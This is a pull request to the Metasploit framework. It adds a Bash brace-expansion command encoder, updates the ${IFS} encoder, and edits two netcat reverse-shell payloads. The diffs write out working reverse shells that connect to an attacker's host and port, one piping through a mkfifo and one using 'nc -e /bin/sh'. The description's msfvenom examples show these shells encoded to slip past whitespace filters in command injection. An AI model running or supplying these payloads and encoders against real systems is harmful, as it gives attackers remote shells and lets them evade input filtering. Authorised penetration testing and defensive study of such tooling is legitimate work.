### PR TITLE
Add brace expansion encoder and update ${IFS} encoder

### DIFF
--- a/lib/msf/core/encoder.rb
+++ b/lib/msf/core/encoder.rb
@@ -136,9 +136,13 @@ class Encoder < Module
     #
     CmdUnixEcho = 'echo'
     #
-    # Bourne shell IFS encoding.
+    # Bourne shell ${IFS} encoding.
     #
-    CmdUnixIfs = 'ifs'
+    CmdUnixIFS = 'ifs'
+    #
+    # Bash brace expansion encoding.
+    #
+    CmdUnixBrace = 'brace'
   end
 
   #

--- a/modules/encoders/cmd/brace.rb
+++ b/modules/encoders/cmd/brace.rb
@@ -1,0 +1,33 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+
+  # This may produce incorrect code due to minimal escaping
+  Rank = LowRanking
+
+  def initialize
+    super(
+      'Name'        => 'Bash Brace Expansion Command Encoder',
+      'Description' => %q{
+        This encoder uses brace expansion in Bash and other shells
+        to avoid whitespace without being overly fancy.
+      },
+      'Author'      => ['wvu', 'egypt'],
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'EncoderType' => Msf::Encoder::Type::CmdUnixBrace
+    )
+  end
+
+  def encode_block(state, buf)
+    # Skip encoding if there are no badchars
+    return buf if state.badchars !~ /\s/
+
+    # Perform brace expansion encoding
+    "{#{buf.gsub(',', '\\,').gsub(/\s+/, ',')}}"
+  end
+
+end

--- a/modules/encoders/cmd/ifs.rb
+++ b/modules/encoders/cmd/ifs.rb
@@ -5,39 +5,29 @@
 
 class MetasploitModule < Msf::Encoder
 
-  # Below normal ranking because this will produce incorrect code a lot of
-  # the time.
+  # This may produce incorrect code, such as in quoted strings
   Rank = LowRanking
 
   def initialize
     super(
-      'Name'             => 'Generic ${IFS} Substitution Command Encoder',
-      'Description'      => %q{
-        This encoder uses standard Bourne shell variable substitution
-        to avoid spaces without being overly fancy.
+      'Name'        => 'Bourne ${IFS} Substitution Command Encoder',
+      'Description' => %q{
+        This encoder uses Bourne ${IFS} substitution to avoid whitespace
+        without being overly fancy.
       },
-      'Author'           => 'egypt',
-      'Arch'             => ARCH_CMD,
-      'Platform'         => 'unix',
-      'EncoderType'      => Msf::Encoder::Type::CmdUnixIfs)
+      'Author'      => ['egypt', 'wvu'],
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'EncoderType' => Msf::Encoder::Type::CmdUnixIFS
+    )
   end
 
-
-  #
-  # Encodes the payload
-  #
   def encode_block(state, buf)
-    # Skip encoding for empty badchars
-    if state.badchars.length == 0
-      return buf
-    end
+    # Skip encoding if there are no badchars
+    return buf if state.badchars !~ /\s/
 
-    # Skip encoding unless space is a badchar
-    unless state.badchars.include?(" ")
-      return buf
-    end
-
-    buf.gsub!(/\s/, '${IFS}')
-    return buf
+    # Perform ${IFS} encoding
+    buf.gsub(/\s+/, '${IFS}')
   end
+
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -51,6 +51,6 @@ module MetasploitModule
   #
   def command_string
     backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
+    "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 35
+  CachedSize = 34
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -45,6 +45,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+    "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh"
   end
 end


### PR DESCRIPTION
### Description

Brace expansion can be used as a whitespace encoder in supported shells.

```
wvu@kharak:~$ {echo,this,is,a,test}
this is a test
wvu@kharak:~$
```

### Caveats

This encoder assumes that shell metacharacters like `{` and `}` will already be escaped or quoted in the unencoded payload. Note that you may not need to escape those metachars if used without special meaning.

For an example, consider `xargs -I {}`:

```
wvu@kharak:~$ xargs -I {} < /dev/null; echo $?
0
wvu@kharak:~$
```

Naturally, the shell you're injecting into needs to have brace expansion. `bash` is a common one, and sometimes `/bin/sh` is symlinked to it.

### Verification Steps

- [x] Test `cmd/ifs` encoder for regressions
  - [x] Test generated payloads
  - [ ] Test arbitrary strings
- [x] Test new `cmd/brace` encoder
  - [x] Test generated payloads
  - [ ] Test arbitrary strings

### Examples

```
wvu@kharak:~/metasploit-framework:feature/brace$ ./msfvenom -p cmd/unix/reverse_netcat_gaping -e cmd/brace -b "\x20" lhost=127.0.0.1
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/brace
cmd/brace succeeded with size 30 (iteration=0)
cmd/brace chosen with final size 30
Payload size: 30 bytes
{nc,127.0.0.1,4444,-e,/bin/sh}
wvu@kharak:~/metasploit-framework:feature/brace$ ^brace^ifs
./msfvenom -p cmd/unix/reverse_netcat_gaping -e cmd/ifs -b "\x20" lhost=127.0.0.1
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/ifs
cmd/ifs succeeded with size 48 (iteration=0)
cmd/ifs chosen with final size 48
Payload size: 48 bytes
nc${IFS}127.0.0.1${IFS}4444${IFS}-e${IFS}/bin/sh
wvu@kharak:~/metasploit-framework:feature/brace$
```

```
wvu@kharak:~/metasploit-framework:feature/brace$ echo -n "echo hello, world" | ./msfvenom -a cmd --platform unix -e cmd/brace -b "\x20" lhost=127.0.0.1
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/brace
cmd/brace succeeded with size 20 (iteration=0)
cmd/brace chosen with final size 20
Payload size: 20 bytes
{echo,hello\,,world}
wvu@kharak:~/metasploit-framework:feature/brace$ {echo,hello\,,world}
hello, world
wvu@kharak:~/metasploit-framework:feature/brace$
```